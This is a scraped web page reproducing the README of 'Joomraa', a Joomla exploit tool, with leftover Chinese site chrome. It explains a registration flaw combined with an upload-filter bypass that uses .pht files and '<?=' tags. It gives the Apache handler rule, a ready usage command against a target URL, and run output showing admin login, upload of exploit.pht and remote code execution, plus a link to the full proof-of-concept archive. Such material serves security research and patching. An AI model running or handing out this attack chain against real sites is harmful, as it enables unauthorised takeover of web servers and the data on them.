扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per: <FilesMatch ".+\.ph(p[345]?|t|tml)$"> SetHandler application/x-httpd-php </FilesMatch> Usage Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution. $ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla @@@ @@@@@@@@@@@@ @@@@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@!@@!@@@@@!@@@@@! @@! @@!@@!@@@@@!@@@@@!@@@@@! !@!!@!@!@!@!@!@!@! !@! !@!!@!@!@!@!@!@!@!@!@!@ !!@@!@!@!@!@!@!@!! !!@ @!@@!@!!@! @!@!@!@!@!@!@!@!@!@ !!!!@!!!!!@!!!!!@! ! !@!!!@!@!!!!@!!!!!!!@!!!!!!! !!:!!:!!!!!:!!!!!: !!:!!: :!! !!:!!!!!:!!! !!::!::!:!:!:!:!:!:!: :!::!:!:!:!:!:!:!:!:!:!: ::: : ::::::: ::::::: ::::: :: :: ::::: ::::: ::: :: : ::: : ::: :::: : : : : : : : : :::: [-] Getting token [-] Creating user account [-] Getting token for admin login [-] Logging in to admin [+] Admin Login Success! [+] Getting media options [+] Setting media options [*] Uploading exploit.pht [*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht [*] Calling exploit [$] Exploit Successful! [*] SUCCESS: http://localhost:8080/joomla Full Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip |
体验盒子
